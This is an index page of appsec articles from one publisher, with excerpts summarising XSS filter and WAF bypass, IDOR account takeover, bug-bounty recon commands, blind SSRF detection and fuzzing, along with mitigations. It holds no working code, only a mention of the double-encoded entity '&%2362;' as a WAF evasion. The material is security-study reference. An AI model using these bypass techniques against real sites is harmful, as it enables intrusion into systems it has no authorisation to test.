undercodetesting.com
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-04-19.
| Date Added | Resource | Excerpt |
|---|---|---|
| 2026-04-19 2026 | XSS Payload Bypass Technique: A Practical GuideXSS | Technique for bypassing XSS filters demonstrates obfuscation using mixed-case and redundant slashes to trigger `onfocus` events. Mitigation strategies include input sanitization with DOMPurify and implementing Content Security Policy (CSP). The article also provides Linux and Windows commands for auditing logs and scanning directories for vulnerable scripts, along with advanced payload encoding via `burp-decoder` or base64. |
| 2026-04-17 2026 | Exploiting IDOR Vulnerabilities: Prevent Account TakeoverIDOR | Analysis of IDOR vulnerabilities demonstrates how attackers exploit Insecure Direct Object Reference flaws, often through manipulating parameters like `UserId` in HTTP requests identified with tools like Burp Suite or cURL, to achieve Account Takeover. Prevention strategies involve robust server-side checks, comparing session data with request parameters, and utilizing unpredictable identifiers such as UUIDs in database schemas. Logging suspicious activity with tools like Fail2Ban further strengthens defenses against these critical OWASP Top 10 threats. |
| 2026-04-17 2026 | The Ultimate Recon Arsenal: 25+ Commands for Bug Bounty WorkflowRecon | Library of 25+ reconnaissance commands streamlines bug bounty workflows, covering advanced subdomain enumeration with tools like Amass and MassDNS, asset discovery and service fingerprinting using HTTPX, directory brute-forcing with Feroxbuster, and JavaScript analysis with LinkFinder. It also details automating these processes with a Bash workflow script and validating critical vulnerabilities using Nuclei. The library emphasizes the necessity of automation for efficient, large-scale target mapping and attack surface assessment, highlighting techniques that move beyond basic automation to masterful enumeration. |
| 2026-04-10 2026 | Mastering Blind SSRF Detection With Burp SuiteSSRF | Analysis of Blind SSRF detection using Burp Suite, detailing techniques like header bruteforcing with Intruder, out-of-band detection via Collaborator, and real-time monitoring with the Taborator extension. It covers advanced payload strategies including numerical ranges and cloud metadata endpoint enumeration, alongside Python scripting for automation and integration with the Burp API, emphasizing the critical need for proactive SSRF testing against evolving cloud-focused exploits. |
| 2026-04-10 2026 | Mastering Fuzzing For Vulnerability Research: A Practical GuideFuzzing | Library for mastering fuzzing techniques, detailing setup with AFL++ and WinAFL, creating fuzzing harnesses, running fuzzers on target binaries, and analyzing crashes with GDB. It covers mitigating common vulnerabilities like stack overflows by replacing functions such as `strcpy` with safer alternatives like `strncpy`, and explores advanced fuzzing with libFuzzer. |
| 2026-04-10 2026 | XSS Payload WAF Bypass: Advanced Techniques to Evade Microsoft's 2025 SecurityXSS | Technique for bypassing Microsoft's 2025 WAF using advanced XSS payloads. It details how double-encoded HTML entities like `&%2362;` evade single-layer WAF decoding, and explores using array dereferencing and indirect property access to bypass signature-based detection. The technique also leverages DOM-based triggers, such as `onchange`, as alternatives to commonly monitored events like `onclick`, for more stealthy execution. |